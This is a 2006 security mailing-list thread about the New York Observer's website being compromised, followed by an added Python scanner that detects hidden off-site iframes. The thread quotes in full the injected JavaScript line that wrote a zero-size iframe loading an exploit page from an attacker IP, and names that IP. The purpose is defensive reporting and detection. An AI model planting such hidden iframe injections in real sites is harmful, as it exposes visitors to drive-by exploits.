[Dshield] New York Newspaper hacked

Tony Nichols tony at mail.applog.com
Mon Feb 27 19:10:10 GMT 2006


On Mon, 2006-02-27 at 07:36 -0500, Tom wrote:
> At 8:57 PM -0600 2/26/06, ptds at majordomo.thedacare.org wrote:
> >On Sun, 26 Feb 2006, Tom wrote:
> >
> >>  At 8:37 AM -0600 2/26/06, ptds at majordomo.thedacare.org wrote:
> >>  >Anyone know a human at the observer in New York?
> >>  >
> >>  >Someone has put an iframe exploit into the code inserted on each page.
> >>  >
> >>  >Don't go here:
> >>  >
> >>  >http://
> >>  >www.observer.com/ 20060227 / 20060227_Joe_Conason_opinions_conason.asp
> >>
> >>  All I see are iframes being used for ads as seen below.
> >>  advertserve.com seems like a totally legit biz and I pulled some ads
> >>  and they are legit also. What made you think this is an exploit?
> >
> >The iframe is inserted on every page, lives here,
> >www.observer.com// includes/ nyo.js
> >
> >  and reads
> >document.write('<iframe height=0 width=0
> >src="http:// 210.118.120.49/ HitCount/ Top.Htm"></iframe>'
> >
> >It seems it was inserted last Sunday.
> >
> >This, when retrieved, is an mht exploit.
> >
> >The less daring can see a jpg of its effect here
> >http://rrcs-24-106-25-102.west.biz.rr.com/exploit.jpg
> >
> >210.118.120.49 these guys don't answer their abuse email:
> >[ ISP IPv4 Admin Contact Information ]
> >Name               : IPAdministrator
> >Phone              : +82-2-509-0534
> >E-Mail             : snnoc at samsung.com
> >
> >[ ISP IPv4 Tech Contact Information ]
> >Name               : IP Manager
> >Phone              : +82-2-509-0534
> >E-Mail             : snnoc at samsung.com
> >
> >[ ISP Network Abuse Contact Information ]
> >Name               : NetworkAbuse
> >Phone              : +82-2-509-0534
> >E-Mail             : ipabuse at samsung.com
> 
> I stand corrected as I didn't look into the js as I only curl'd a few 
> files. Thanks Paul.
> 
> btw, 210.118.120.49 contact is help at etimes.net
> 
> Tom

I called and notified one of the website managers at the paper... and
forwarded the comments from the both of you.

Great catch... most would not have noticed.

t o n y 
-- 
Tony Nichols <tony at mail.applog.com>
Appalachian Log Structures Inc.
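
The point made in the thread, that the injected iframe sat in a shared script include rather than in the page HTML, shown as an added example that is not part of the original messages: a Python check that scans a page and the bodies of its script includes for zero-size iframes pointing off-site. The sample page, script body, hostnames and addresses are constructed, and `scan_page` and its helpers are hypothetical names.

```python
import re
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I | re.S)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
SCRIPT_SRC_RE = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)

def iframe_attrs(tag_body):
    """Parse quoted or unquoted attributes of one <iframe ...> tag."""
    return {m.group(1).lower(): m.group(2) or m.group(3) or m.group(4) or ""
            for m in ATTR_RE.finditer(tag_body)}

def is_hidden(attrs):
    """Zero height/width or a CSS hide: the frame is not meant to be seen."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return (attrs.get("height") in {"0", "0px"} or attrs.get("width") in {"0", "0px"}
            or "display:none" in style or "visibility:hidden" in style)

def scan(text, site_host):
    """Return src URLs of hidden iframes that load from another host.
    Works on raw HTML and on JavaScript that builds the tag in a string."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = iframe_attrs(m.group(1))
        host = urlparse(attrs.get("src", "")).hostname
        if is_hidden(attrs) and host and host != site_host:
            hits.append(attrs["src"])
    return hits

def scan_page(page_html, fetched_scripts, site_host):
    """fetched_scripts maps each <script src> value to its downloaded body.
    Checking only page_html would miss a tag written by an include."""
    findings = {"(page)": scan(page_html, site_host)}
    for src in SCRIPT_SRC_RE.findall(page_html):
        findings[src] = scan(fetched_scripts.get(src, ""), site_host)
    return {where: urls for where, urls in findings.items() if urls}

# Constructed sample: a visible ad frame in the page, a hidden one in the include.
PAGE = """<html><body>
<script src="/includes/site.js"></script>
<iframe width=468 height=60 src="http://ads.example.net/banner"></iframe>
</body></html>"""
SCRIPTS = {"/includes/site.js":
           "document.write('<iframe height=0 width=0\n"
           "src=\"http://192.0.2.10/counter.htm\"></iframe>');"}

if __name__ == "__main__":
    print(scan_page(PAGE, SCRIPTS, "www.example.com"))
```
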


